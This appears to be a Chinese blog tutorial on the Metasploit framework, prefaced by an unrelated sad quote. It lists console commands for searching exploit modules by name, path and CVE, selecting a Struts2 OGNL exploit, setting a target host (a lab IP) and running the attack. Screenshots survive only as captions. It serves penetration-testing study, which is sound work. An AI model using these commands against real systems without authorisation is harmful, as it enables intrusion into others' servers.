终于熬成了不想和任何人说话,包括家里的人都不想联系,厌倦了这个世界的是是非非,就算你说晚上有太阳我都不想辩解了。。。

----  网易云热评

作用:渗透攻击模块可以直接发起渗透攻击

1、显示所有渗透攻击模块

show exploits

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit

根据需求筛选模块

search -h

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_02

2、查找关于mysql数据库的攻击模块

search name:mysql type:exploit

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_03

3、查找路径含有mysql的模块

search path:mysql

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_04

4、查找漏洞编号

search cve-2019-0230

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_05

5、选择要利用的模块

use 0

use exploit/multi/http/struts2_multi_eval_ognl

use exploit 按tab键获取相关提示

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_06

6、了解模块相关信息

info

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_07

7、查看需要设置的参数

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_08

8、设置共计目标

set rhosts 192.168.139.128

9、攻击

run

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_09

 

 

Metasploit -- 渗透攻击模块(exploit)文字版_Metasploit_10